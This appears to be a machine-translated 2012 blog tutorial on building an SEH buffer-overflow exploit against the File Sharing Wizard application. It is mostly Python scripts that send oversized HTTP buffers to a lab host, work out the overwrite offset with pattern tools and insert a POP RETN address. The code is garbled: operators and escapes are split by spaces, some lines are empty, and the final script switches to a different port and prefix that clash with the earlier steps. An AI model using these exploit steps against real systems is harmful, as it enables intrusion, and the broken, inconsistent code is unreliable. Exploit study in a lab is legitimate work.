!!!

Wednesday, February 22, 2012

Eksploitasi File Sharing Wizard

At this time fuzzer, which will try to fuzzing is the File Sharing Wizard
First run the File Shareing Wisard Then, run well and then attach OllyDbg File Sharing Wizard into OllyDbg.
After successfully attach to the File Sharing in OllyDbg, run the following application fuzzer

#! usr / bin / python
import socket
target_address = "192.168.56.101"
target_port = 80
buffer = "http://"
buffer + = "A" * 80 000
buffer + = "\ r \ n \ r \ n"
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()



In the above we can see a fuzzer application fuzzer sends data into a buffer of 80 000 bytes File Sharing. Notice what happens on system memory applications

 

The next is to look at how many bytes to overwrite Seh address. Tools used are pattern_create.rb

after that copy the results into the above pattern_create existing fuzzer created earlier

#! usr / bin / python
import socket
target_address = "192.168.56.101"
target_port = 80
buffer = "http://"
buffer + =
buffer + = "\ r \ n \ r \ n"
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()
Run fuzzer you have changed and notice OllyDbg.

Then use pattern_offset to know on how many bytes of EIP overite



Further still using the same fuzzer, change a 1040 byte buffer nlai to see if the calculations are correct

#! usr / bin / python
import socket
target_address = "192.168.56.101"
target_port = 80
buffer = "http://"
buffer + = "\ X90" * 1040
buffer + = "\ xCC \ xCC \ xCC \ xCC"
buffer + = "\ X41 \ X41 \ X41 \ X41"
buffer + = "\ X90" * (80 004-len (buffer))
buffer + =
buffer + = "\ r \ n \ r \ n"
sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()

Fuzzer run back over and see the results in OllyDbg




Now enter the address of POP RETN

Enter the POP address RETN into fuzzer
#! usr / bin / python
import socket
target_address = "192.168.56.101"
target_port = 6660

buffer = "USV"
buffer + = "\ X90" * 962
buffer + = "\ xCC \ xCC \ xCC \ xCC"
buffer + = "\ xFF \ x25 \ xF7 \ 7D"
buffer + = "\ X90" * (2504-len (buffer))
buffer + = "\ r \ n \ r \ n" sock = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
sock.connect ((target_address, target_port))
sock.send (buffer)
sock.close ()


 
 
Posted by at 11:03 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)